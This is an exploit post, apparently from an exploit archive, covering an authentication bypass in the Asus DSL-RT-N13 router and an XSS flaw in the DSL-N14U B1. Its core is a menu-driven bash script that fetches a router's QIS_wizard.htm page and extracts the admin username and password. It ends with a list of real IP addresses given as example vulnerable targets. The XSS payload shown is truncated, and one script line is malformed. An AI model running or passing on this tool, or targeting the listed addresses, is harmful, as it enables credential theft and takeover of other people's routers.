In the name of god ------------------------- Exploit Title : -------------------- Asus Routers (DSL-RT-N13 , DSL-N14U B1) Vulnerability Exploit Author : --------------------- 4TT4CK3R Category : --------------------- Remote and Local Home Page : --------------------- https://asus.com Google Dork : --------------------- None Models that Vulnerable in here : --------------------------------------------- -) DSL-RT-N13 > Bypass Authentication Vulnerability -) DSL-N14U B1 > Cross Site Scripting Vulnerability [##] DSL-N14U B1 Cross Site Scripting Vulnerability -------------------------------------------------------------- This vulnerability works on target remote and local ip address. Payload : ""> Vulnerable Page : Main Page Screenshot : http://uupload.ir/files/az1i_shot.png [##] DSL-RT-N13U Bypass Authentication Vulnerability --------------------------------------------------------------- With this vulnerability we can find administrator username and password and login into admin panel of asus router model DSL-RT-N13. Exploit source of this vulnerability (ARE Script): #!/bin/bash # Asus Routers Exploit (ARE) # Coded by : 4TT4CK3R # Category : Local and Remote # Reuirements : Opening ports 80,8080,443 # Models that affecta : DSL-RT N13 reset dir = "/opt/" rm -rf /opt/a.htm clear echo "" echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]" echo "" echo -e "\e[93m [+] Tool name: Asus Router Exploit\e[0m" echo -e "\e[93m [+] Models that affecta : DSL-RT N13 \e[0m" echo -e "\e[93m [+] Coded by: 4TT4CK3R\e[0m" echo "" echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]" echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo "" echo -e "\e[93m Options Of Tool: " echo "" echo " 1. Start" echo " 2. About" echo " 3. Exit" echo "" read -p " Please choose an option: " option echo "" echo "" if [ $option == "2" ] then clear echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo " [+] About this tool :" echo "" echo -e " Hi dear friend ... This tool is an asus router exploiter. This tool working with an vulnerability on Asus Routers and we can using this tool for bypass authentication and exploit the router config panel. Also this tool working on DSL-RT N13 models of asus company. Thanks for using this tool and my exploit." echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo "" elif [ $option == "3" ] then clear exit elif [ $option == "1" ] then clear echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo " [+] Starting Steps " echo "" echo "" read -p " [++] Please enter target ip (ex: 5.2.5.5) : " ip echo "" read -p " [++] Please enter port number (ex: 8080) : " port echo "" read -p " [++] Please enter protocol (http or https) : " protocol echo "" echo " [**] Ok, Please wait ... " echo "" curl --silent $protocol://$ip:$port/QIS_wizard.htm > $dir/a.htm echo "" echo " [**] Searching data ..." echo "" cat $dir/a.htm | grep "http_username" | cut -d " " -f4 | cut -d '"' -f2 > $dir/user cat $dir/a.htm | grep "http_passwd" | cut -d " " -f4 | cut -d '"' -f2 > $dir/pass username=$(<$dir/user) password=$(<$dir/pass) echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" echo " [>>] Address : $protocol://$ip:$port" echo " [>>] Username : $username" echo " [>>] Password : $password" echo "" for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo echo "" else clear echo "" echo " [+] Wrong selection. exiting ..." sleep 2 exit fi exit Video demo of this tool : ----------------------------------- https://www.videosprout.com/video?id=be9d22de-6871-4521-96be-1c6def8c2cce Other routers for example DSL-RT N13 model : ------------------------------------------------- http://94.190.36.152 http://88.86.198.149:8080 http://220.133.187.27:8080 Other routers for example DSL-N14U B1 model : ------------------------------------------------- http://80.188.231.233:8080 http://197.89.27.160:8080 Exploited by : -------------------- 4TT4CK3R